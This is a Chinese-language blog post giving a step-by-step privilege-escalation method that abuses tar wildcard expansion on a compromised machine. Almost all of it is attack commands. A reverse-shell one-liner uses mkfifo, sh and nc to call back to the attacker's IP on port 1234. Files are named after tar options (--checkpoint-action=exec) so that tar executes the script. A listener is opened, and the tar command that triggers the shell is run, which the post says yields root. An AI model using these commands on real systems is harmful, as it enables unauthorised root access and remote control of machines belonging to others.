首页 > 其他分享 >基于tar通配符漏洞的提权方法

基于tar通配符漏洞的提权方法

时间:2023-01-25 17:22:20浏览次数:35  
标签:tmp www tar 通配符 提权 html var

以普通用户进入目标机后,若是可以运行tar指令,则可以通过以下的方法进行提权

原理:

tar有通配符*的漏洞,tar用通配符来压缩文件并读取文件名,若是看到有参数则将执行。

 

操作:

1.先cd到一个用户有完全执行命令的文件夹下

例如:www-data用户的完全权限文件夹为/var/www/html

 

2.创建一个reverse shell脚本

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc you_ip 1234 >/tmp/f' > shell.sh

you_ip为本机IP地址
1234为将要监听的端口

 

3.创建tar将要运行的参数

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

 

4.在本机上打开本地监听

nc -lnvp 1234

 

5.在目标机上执行命令

tar cf /var/www/html.tgz *

c代表创建
f代表类型为文件
最后的通配符*是精华所在
这整个命令意思就是:
因为之前已经cd到/var/www/html目录下了,
然后就直接将这整个目录下的所有文件进行压缩,
如果遇到参数则执行,压缩后创建一个文件,创建的文件目录可以随便定个可以写入的目录

最后在本地机上就已经以root登入了

标签:tmp,www,tar,通配符,提权,html,var
From: https://www.cnblogs.com/jhinjax/p/17067082.html

相关文章

  • LLVM目标无关代码生成器Target-Independent Code Generator
    LLVM目标无关代码生成器Target-IndependentCodeGenerator介绍LLVM目标无关代码生成器是一个框架,提供了一套可重用组件,用于将LLVM内部表示转换为指定目标的机器代码,无论......
  • tar
     Operationmode:-A--catenate---concatenate 追加模式,不能是压缩的tar-Aa.tar-vfb.tar追加a.tar到b.tar后面-c--create创建模式,目录默认递归,--......
  • JavaScript: div,textarea set or get value
    <!doctypehtml><html><head><metacharset="utf-8"><metaname="viewport"content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,u......
  • 使用Addressables.LoadAssetAsync<Asset>(target)加载unity资源,不止是gameobject
    要声明的方法:publicstaticasyncTask<string>ReadJsonData(stringtarget){  TextAssetjsonDataObject=awaitAddressables.LoadAssetAsync<TextAsset>(target).......
  • Target EDI对接详解 – EDI业务测试及上线
    Target塔吉特是美国仅次于Walmart沃尔玛的第二大巨型折扣零售百货集团,在2020财年实现零售收入同比增长19.8%,赶超了CVS和Tesco,并在2020财年的销售额增长超过150......
  • sudo+dstat提权
    Dstat是vmstat、iostat和ifstat的通用替代品。Dstat克服了一些限制并添加了一些额外的功能。具体详细介绍可以参考:https://linux.die.net/man/1/dstatdstat有个功能......
  • Target EDI 对接详解 – ECGrid AS2 连接
    Target塔吉特是美国仅次于Walmart沃尔玛的第二大巨型折扣零售百货集团。Target在2020财年实现零售收入同比增长19.8%,赶超了CVS和Tesco,并在2020财年的销售额增长超过......
  • SpringBoot @Target、@Retention、@Documented注解简介
    jdk1.5起开始提供了4个元注解:@Target、@Retention、@Documented、@Inherited。何谓元注解?就是注解的注解。在程序开发中,有时候我们需要自定义一个注解,这个自定义注解类就......
  • matlab练习程序(门限回归TR与门限自回归TAR)
    门限回归和门限自回归是对基本的回归和自回归加上一个阈值判断。下面简单的表述一下公式。回归模型可以用下述公式表示:则门限回归可以表示为: 自回归模型可以用下述......
  • MetadataReader、ClassMetadata、AnnotationMetadata的简单使用
    在Spring源码中有很多场景会去解析类的信息,比如类名、类中的方法、类上的注解,这些都可以称之为类的元数据,在Spring中对类的元数据做了抽象,并提供了一些工具类。MetadataRead......